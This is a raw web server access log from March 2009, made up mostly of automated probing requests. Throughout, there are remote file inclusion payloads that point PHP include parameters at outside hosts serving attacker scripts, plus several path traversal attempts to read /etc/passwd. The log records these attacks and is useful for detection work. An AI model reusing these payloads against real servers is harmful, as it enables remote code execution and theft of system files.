195.137.140.179 - - [07/Mar/2009:05:16:54 -0600] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:54 -0600] "GET /logs/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:56 -0600] "GET /logs/access_log.1233360000/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:16:56 -0600] "GET /logs/access_log.1233878400/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:20:33 -0600] "GET /logs/access_log.1232755200/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:20:33 -0600] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:20:34 -0600] "GET /logs/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:20:42 -0600] "GET /logs/access_log.1233360000/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
66.7.212.241 - - [07/Mar/2009:05:20:52 -0600] "GET /logs/access_log.1232755200/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://thepopculturestore.com/pulaid.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
66.7.212.241 - - [07/Mar/2009:05:20:52 -0600] "GET /logs/access_log.1233360000/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://thepopculturestore.com/pulaid.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
66.7.212.241 - - [07/Mar/2009:05:20:52 -0600] "GET /logs/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://thepopculturestore.com/pulaid.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
66.7.212.241 - - [07/Mar/2009:05:20:52 -0600] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://thepopculturestore.com/pulaid.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
66.7.212.241 - - [07/Mar/2009:05:21:38 -0600] "GET /logs/access_log.1232841600/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://thepopculturestore.com/pulaid.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
77.221.130.2 - - [07/Mar/2009:05:23:17 -0600] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
77.221.130.2 - - [07/Mar/2009:05:23:17 -0600] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [07/Mar/2009:05:23:17 -0600] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
77.221.130.2 - - [07/Mar/2009:05:23:21 -0600] "GET /logs/access_log.1232064000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
77.221.130.15 - - [07/Mar/2009:05:23:23 -0600] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
77.221.130.15 - - [07/Mar/2009:05:23:23 -0600] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
77.221.130.15 - - [07/Mar/2009:05:23:23 -0600] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.15 - - [07/Mar/2009:05:23:23 -0600] "GET /logs/access_log.1232064000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
195.137.140.179 - - [07/Mar/2009:05:25:07 -0600] "GET /logs/access_log.1233878400/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.6.18.252 - - [07/Mar/2009:05:28:37 -0600] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.252 - - [07/Mar/2009:05:28:37 -0600] "GET / HTTP/1.0" 200 3233 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.67.180 - - [07/Mar/2009:05:28:54 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [07/Mar/2009:05:28:55 -0600] "GET /logs/access_log.1226275200 HTTP/1.1" 200 177702 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
151.1.32.20 - - [07/Mar/2009:05:30:24 -0600] "GET /logs//errors.php?error=http://www.bibliotecas.uvmnet.edu/portico-uvm-out/components/com_login/idste.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
151.1.32.20 - - [07/Mar/2009:05:30:25 -0600] "GET //errors.php?error=http://www.bibliotecas.uvmnet.edu/portico-uvm-out/components/com_login/idste.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
151.1.32.20 - - [07/Mar/2009:05:30:29 -0600] "GET /logs//errors.php?error=http://www.bibliotecas.uvmnet.edu/portico-uvm-out/components/com_login/idste.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
151.1.32.20 - - [07/Mar/2009:05:30:29 -0600] "GET //errors.php?error=http://www.bibliotecas.uvmnet.edu/portico-uvm-out/components/com_login/idste.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
77.221.130.17 - - [07/Mar/2009:05:30:41 -0600] "GET /config/dbutil.bck.php?confdir=http://harasin.brinkster.net/id.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
77.221.130.17 - - [07/Mar/2009:05:30:41 -0600] "GET /logs/config/dbutil.bck.php?confdir=http://harasin.brinkster.net/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
81.169.162.47 - - [07/Mar/2009:05:31:12 -0600] "GET /logs/classes/adodbt/sql.php?classes_dir=http://old.no-mia.com/tjzwjhdtj/pqkewt/id? HTTP/1.1" 404 310 "-""libwww-perl/5.806"
81.169.162.47 - - [07/Mar/2009:05:31:12 -0600] "GET /classes/adodbt/sql.php?classes_dir=http://old.no-mia.com/tjzwjhdtj/pqkewt/id? HTTP/1.1" 404 305 "-""libwww-perl/5.806"
77.221.130.17 - - [07/Mar/2009:05:42:14 -0600] "GET /config/dbutil.bck.php?confdir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 "-""libwww-perl/5.805"
77.221.130.17 - - [07/Mar/2009:05:42:14 -0600] "GET /logs/config/dbutil.bck.php?confdir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 309 "-""libwww-perl/5.805"
201.232.54.48 - - [07/Mar/2009:05:43:41 -0600] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://tronador.ulagos.cl/cursosvirtuales/CARTSIG/group/copyright.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
201.232.54.48 - - [07/Mar/2009:05:43:41 -0600] "GET /logs/access_log.1234137600///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://tronador.ulagos.cl/cursosvirtuales/CARTSIG/group/copyright.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
212.97.132.101 - - [07/Mar/2009:05:48:06 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://variant-1.ru/netcat_files/kambe.txt?? HTTP/1.0" 404 302 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Mar/2009:05:48:06 -0600] "GET //include/admin.lib.inc.php?site_path=http://variant-1.ru/netcat_files/kambe.txt?? HTTP/1.0" 404 297 "-""libwww-perl/5.53"
203.97.30.12 - - [07/Mar/2009:05:50:28 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:05:50:28 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:05:50:29 -0600] "GET /logs/access_log.1232841600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:05:51:12 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:05:51:12 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:05:51:13 -0600] "GET /logs/access_log.1232841600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:05:51:21 -0600] "GET /logs/access_log.1232755200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:05:51:40 -0600] "GET /logs/access_log.1232755200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:05:52:04 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:05:52:04 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
203.97.30.12 - - [07/Mar/2009:05:52:04 -0600] "GET /logs/access_log.1232841600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
77.221.130.4 - - [07/Mar/2009:05:55:49 -0600] "GET /logs/access_log.1231286400//include/write.php?dir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.221.130.4 - - [07/Mar/2009:05:55:49 -0600] "GET /logs//include/write.php?dir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
77.221.130.4 - - [07/Mar/2009:05:55:50 -0600] "GET //include/write.php?dir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
77.221.130.4 - - [07/Mar/2009:05:55:50 -0600] "GET //include/write.php?dir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
77.221.130.4 - - [07/Mar/2009:05:55:50 -0600] "GET /logs//include/write.php?dir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
77.221.130.4 - - [07/Mar/2009:05:55:50 -0600] "GET /logs/access_log.1231286400//include/write.php?dir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.221.130.4 - - [07/Mar/2009:05:56:12 -0600] "GET /logs/access_log.1231804800//include/write.php?dir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.221.130.4 - - [07/Mar/2009:05:56:14 -0600] "GET /logs/access_log.1231804800//include/write.php?dir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.160.96.54 - - [07/Mar/2009:05:57:43 -0600] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.0" 404 346 "-""libwww-perl/5.808"
200.160.96.54 - - [07/Mar/2009:05:57:45 -0600] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.0" 404 351 "-""libwww-perl/5.808"
203.97.30.12 - - [07/Mar/2009:05:57:48 -0600] "GET /logs/access_log.1232755200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
200.160.96.54 - - [07/Mar/2009:05:57:57 -0600] "GET /logs/access_log.1233792000/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.0" 404 373 "-""libwww-perl/5.808"
211.105.96.41 - - [07/Mar/2009:05:59:18 -0600] "GET /logs//include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.105.96.41 - - [07/Mar/2009:05:59:18 -0600] "GET /logs/access_log.1231286400//include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.105.96.41 - - [07/Mar/2009:05:59:18 -0600] "GET //include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.105.96.41 - - [07/Mar/2009:05:59:32 -0600] "GET //include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.105.96.41 - - [07/Mar/2009:05:59:32 -0600] "GET /logs/access_log.1231286400//include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.105.96.41 - - [07/Mar/2009:05:59:32 -0600] "GET /logs//include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
200.160.96.54 - - [07/Mar/2009:06:00:06 -0600] "GET /logs/access_log.1234828800/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.0" 404 373 "-""libwww-perl/5.808"
211.105.96.41 - - [07/Mar/2009:06:03:19 -0600] "GET //include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.105.96.41 - - [07/Mar/2009:06:03:19 -0600] "GET /logs/access_log.1231286400//include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.105.96.41 - - [07/Mar/2009:06:03:19 -0600] "GET /logs//include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
80.25.82.126 - - [07/Mar/2009:06:04:48 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 306 "-""libwww-perl/5.76"
80.25.82.126 - - [07/Mar/2009:06:04:49 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 301 "-""libwww-perl/5.76"
211.105.96.41 - - [07/Mar/2009:06:05:33 -0600] "GET /logs/access_log.1231804800//include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.105.96.41 - - [07/Mar/2009:06:05:33 -0600] "GET /logs/access_log.1231804800//include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.19.130.218 - - [07/Mar/2009:06:06:53 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
67.19.130.218 - - [07/Mar/2009:06:06:53 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
211.105.96.41 - - [07/Mar/2009:06:07:51 -0600] "GET /logs/access_log.1231804800//include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.160.96.54 - - [07/Mar/2009:06:18:15 -0600] "GET /logs/access_log.1233619200/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.0" 404 373 "-""libwww-perl/5.808"
66.249.67.180 - - [07/Mar/2009:06:22:05 -0600] "GET /logs/access_log.1226016000 HTTP/1.1" 200 25992 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [07/Mar/2009:06:29:12 -0600] "GET /logs/access_log.1215388800 HTTP/1.1" 200 673 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
80.25.82.126 - - [07/Mar/2009:06:31:34 -0600] "GET /logs//index.php?DOCUMENT_ROOT=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 298 "-""libwww-perl/5.76"
80.25.82.126 - - [07/Mar/2009:06:31:35 -0600] "GET //index.php?DOCUMENT_ROOT=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 293 "-""libwww-perl/5.76"
64.118.90.253 - - [07/Mar/2009:06:32:28 -0600] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.garage-croixblanche.com/b1ttletX.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.823"
64.118.90.253 - - [07/Mar/2009:06:32:28 -0600] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.garage-croixblanche.com/b1ttletX.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.823"
208.80.195.35 - - [07/Mar/2009:06:38:46 -0600] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {543B4D99-A991-446C-AFCE-A657D5CB6F32}; SV1; .NET CLR 1.1.4322)"
77.221.130.17 - - [07/Mar/2009:06:44:06 -0600] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://harasin.brinkster.net/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
77.221.130.17 - - [07/Mar/2009:06:44:06 -0600] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://harasin.brinkster.net/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
77.221.130.17 - - [07/Mar/2009:06:44:08 -0600] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 308 "-""libwww-perl/5.805"
77.221.130.17 - - [07/Mar/2009:06:44:08 -0600] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
208.111.154.15 - - [07/Mar/2009:06:49:32 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.15 - - [07/Mar/2009:06:49:32 -0600] "GET /_vti_cnf HTTP/1.1" 301 330 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.15 - - [07/Mar/2009:06:49:33 -0600] "GET /_vti_cnf/ HTTP/1.1" 200 676 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
70.38.71.140 - - [07/Mar/2009:07:07:54 -0600] "GET /logs//?DOCUMENT_ROOT=http://cg-cars.com/.../safe1.txt? HTTP/1.1" 200 180672 "-""libwww-perl/5.805"
70.38.71.140 - - [07/Mar/2009:07:07:55 -0600] "GET //?DOCUMENT_ROOT=http://cg-cars.com/.../safe1.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
64.118.90.253 - - [07/Mar/2009:07:10:01 -0600] "GET /logs//phplive/help.php?css_path=http://www.garage-croixblanche.com/b1ttletX.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.823"
64.118.90.253 - - [07/Mar/2009:07:10:02 -0600] "GET //phplive/help.php?css_path=http://www.garage-croixblanche.com/b1ttletX.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.823"
122.100.5.82 - - [07/Mar/2009:07:13:16 -0600] "GET /logs/errors.php?error=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
122.100.5.82 - - [07/Mar/2009:07:13:16 -0600] "GET /errors.php?error=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
122.100.5.82 - - [07/Mar/2009:07:13:16 -0600] "GET /logs/access_log.1231977600/errors.php?error=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
122.100.5.82 - - [07/Mar/2009:07:15:05 -0600] "GET /errors.php?error=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
122.100.5.82 - - [07/Mar/2009:07:15:05 -0600] "GET /logs/access_log.1227657600/errors.php?error=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
122.100.5.82 - - [07/Mar/2009:07:15:05 -0600] "GET /logs/errors.php?error=http://www.gainwealth.com.my/administrator/images/angry.gif??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
124.217.242.70 - - [07/Mar/2009:07:16:20 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ydcommunity.com/board/data/idomila.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
124.217.242.70 - - [07/Mar/2009:07:16:20 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ydcommunity.com/board/data/idomila.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
124.217.242.70 - - [07/Mar/2009:07:16:21 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ydcommunity.com/board/data/idomila.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
124.217.242.70 - - [07/Mar/2009:07:16:21 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ydcommunity.com/board/data/idomila.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
124.217.242.70 - - [07/Mar/2009:07:16:23 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ydcommunity.com/board/data/idomila.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
124.217.242.70 - - [07/Mar/2009:07:16:24 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ydcommunity.com/board/data/idomila.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
211.202.2.220 - - [07/Mar/2009:07:16:52 -0600] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.202.2.220 - - [07/Mar/2009:07:16:52 -0600] "GET //include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.202.2.220 - - [07/Mar/2009:07:16:52 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.202.2.220 - - [07/Mar/2009:07:16:52 -0600] "GET /logs/access_log.1234569600//include/bbs.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
200.160.96.54 - - [07/Mar/2009:07:17:10 -0600] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.0" 404 346 "-""libwww-perl/5.808"
200.160.96.54 - - [07/Mar/2009:07:17:10 -0600] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.0" 404 351 "-""libwww-perl/5.808"
165.194.27.141 - - [07/Mar/2009:07:18:03 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://swingtradesignal.com/b1ttletX.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
165.194.27.141 - - [07/Mar/2009:07:18:04 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://swingtradesignal.com/b1ttletX.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
66.225.253.109 - - [07/Mar/2009:07:18:13 -0600] "GET //?DOCUMENT_ROOT=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.810"
66.225.253.109 - - [07/Mar/2009:07:18:13 -0600] "GET /logs//?DOCUMENT_ROOT=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 180672 "-""libwww-perl/5.810"
66.225.253.109 - - [07/Mar/2009:07:18:49 -0600] "GET /logs//?DOCUMENT_ROOT=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 180672 "-""libwww-perl/5.810"
66.225.253.109 - - [07/Mar/2009:07:18:49 -0600] "GET //?DOCUMENT_ROOT=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.810"
89.113.221.213 - - [07/Mar/2009:07:19:45 -0600] "GET //?DOCUMENT_ROOT=http://admins.onceinalifespan.com/test.txt??? HTTP/1.1" 200 3245 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
89.113.221.213 - - [07/Mar/2009:07:19:48 -0600] "GET /logs//?DOCUMENT_ROOT=http://admins.onceinalifespan.com/test.txt??? HTTP/1.1" 200 180672 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
211.202.2.220 - - [07/Mar/2009:07:20:18 -0600] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
211.202.2.220 - - [07/Mar/2009:07:20:18 -0600] "GET /logs/access_log.1231027200/vwar/convert/mvcw.php?step=1&vwar_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.202.2.220 - - [07/Mar/2009:07:20:19 -0600] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
64.15.159.42 - - [07/Mar/2009:07:26:37 -0600] "GET //?DOCUMENT_ROOT=http://offthepitch.ca/copyright[1].txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
